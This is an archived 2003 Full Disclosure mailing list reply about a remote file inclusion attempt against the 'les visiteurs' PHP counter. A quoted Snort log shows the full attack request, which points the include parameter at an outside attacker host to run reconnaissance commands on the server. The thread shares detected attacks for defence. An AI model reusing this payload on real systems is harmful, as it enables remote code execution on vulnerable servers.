Full Disclosure mailing list archives

Re: file inclusion (les visiteurs)

From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh () nsrg-security com>
Date: Mon, 1 Dec 2003 19:07:35 +0100

Hi Daniel ,
They are kiddies... :(
I was looking the files and there are only high-risk-rated exploits
downloaded from packet storm , ptrace , etc .
And they are running remote php shells in their server.... xD

See you in the IRC tonight ?

Best regards,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453  7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________
----- Original Message ----- 
From: "Dan" <dan () lockedbox net>
To: <full-disclosure () lists netsys com>
Sent: Monday, December 01, 2003 6:02 PM
Subject: Re: [Full-disclosure] file inclusion (les visiteurs)

This is the same set of files that I noticed last week(xfteam.net) it

seems

they closed their domain down? (I cannot find it)
Does anyone know if these ppl are a real sec organisation? or just some
kiddies ?

Cheers,
Daniel.

"Evert Daman" <evert () digipix org> wrote:


last night snort detected this request:

GET

/counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls



because i patched 'les visiteurs' as described by 'matthieu peschaud'
on bugtraq on the 26 of october nothing happend, but it looks like

someone

is trying to exploit this bug.
just want to mention it to this wonderfull list :)

kind regards,
Evert




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

file inclusion (les visiteurs) Evert Daman (Dec 01)
- Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
- Re: file inclusion (les visiteurs) Dan (Dec 01)
  - Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 01)
    - Re: file inclusion (les visiteurs) Evert Daman (Dec 01)
    - Re: file inclusion (les visiteurs) gazpa (Dec 01)
    - Re: file inclusion (les visiteurs) Christian Horchert (Dec 01)
    - Re: file inclusion (les visiteurs) Lorenzo Hernandez Garcia-Hierro (Dec 02)
    - Re: file inclusion (les visiteurs) gazpa (Dec 02)
    - Re: file inclusion (les visiteurs) Christian Horchert (Dec 02)
    - Re: file inclusion (les visiteurs) Evert Daman (Dec 03)
- Re: file inclusion (les visiteurs) root (Dec 01)
  - Re: file inclusion (les visiteurs) Christian Horchert (Dec 01)